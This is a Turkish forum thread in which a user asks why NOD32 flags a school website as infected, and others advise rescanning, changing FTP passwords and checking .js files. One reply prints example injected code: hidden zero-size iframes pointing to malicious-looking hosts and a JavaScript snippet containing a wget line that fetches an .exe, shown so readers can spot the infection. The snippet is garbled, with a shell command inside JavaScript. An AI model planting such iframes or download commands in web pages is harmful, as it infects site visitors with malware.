NOD32 Sitede trojan algılıyor..Yardım Lütfen

Kodla Büyü
lleoni510

lleoni510

Seçkin Üye
Seçkin Üye
Mesajlar
580
Arkadaşlar http://bafrasml.meb.k12.tr okul sitesinde NOD32 tehdit algılıyor. Siteyi komple taramadan geçirip tekrar tekrar upload ettim ancak düzelmedi. Bu sorunu nasıl düzeltebilirim? Böyle bir sorun yaşayanınız varmı?
Yardımcı olursanız sevinirim.
Şimdiden teşekkürler..
 
başka bir antivirüs programı, kaspersky tavsiye, denemelisiniz,
upload etmeden önce combofix çalıştırıp sonra gönderin ftp'ye
 
Hocam verdiğinbir bağlantı yada bir java kod sıkıntı yaratmış olabilir. Uyarı mesajında saldırının nerelerde barındığını yazıyor.
 
banada arada sırada oluyor
sitedeki sayfaların hepsini ftp den atıp yeniliyorum
sonrada ftp şifreyi değişince uzun bir süre sıkıntı yaşamıyorum
 
Evet hocam bende görülenlerde bunlar.
Siz farklı neler buldunuz?
Bencede js uzantılı olan dosyalarınız hasta gibi.
 

Ekli dosyalar

  • site uyarı.JPG
    site uyarı.JPG
    28.9 KB · Görüntüleme: 842
Hocam bence kodları kontrol et.

nasıl bir iştir bilmiyorum bende de 1 kere oldu, kodlara sacma sapan alakasız seyler ekleniyor,

bir incele derim.
 
java .js dosyaları virüslü gözüküyor iframe virüsü bulaşmiş olabilir sitene java ile gizli download yapiyor millet trojan veya keyloggeri indirtiyor o yüzden heralde artik antilere takilio
 
İframe virüsü o dökümanlardan temizlenmez :D Bilgisayarına Format cekip ilk olarak driverlerini tanıttıktan sonra hiç bir sekilde USB aygıtı vs takmadan direk 30 günlük nod32 indirip güncelle sitenin yedeklerini ftpden indir herhangi bir upload sitesine et veya tekrardan yükle giderilmis olabilir iframe virüs kodları su sekilde olbilir index.php veya htmlde bakabilirsin

CODE
<iframe src='http://81.95.145.24x/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Varan2

<iframe src="http://110.a38q.cn/atay.htm" width="100" height="0" frameborder="0"></iframe>

veya otomotik encode edilmiş codlar olabilir
Egg:


function encodeMyHtml() {
encodedHtml = escape(encodeHtml.htmlToEncode.value);
encodedHtml = encodedHtml.replace(/\//g,"%2F");
encodedHtml = encodedHtml.replace(/\?/g,"%3F");
encodedHtml = encodedHtml.replace(/=/g,"%3D");
encodedHtml = encodedHtml.replace(/&/g,"%26");
encodedHtml = encodedHtml.replace(/@/g,"%40");
wget shell -o http://www.zzswhotel.com/atay.exe 1
encodeHtml.htmlEncoded.value = encodedHtml;
}
 
Cevap yazmak için giriş yap yada kayıt ol.
BBNET
Geri
Üst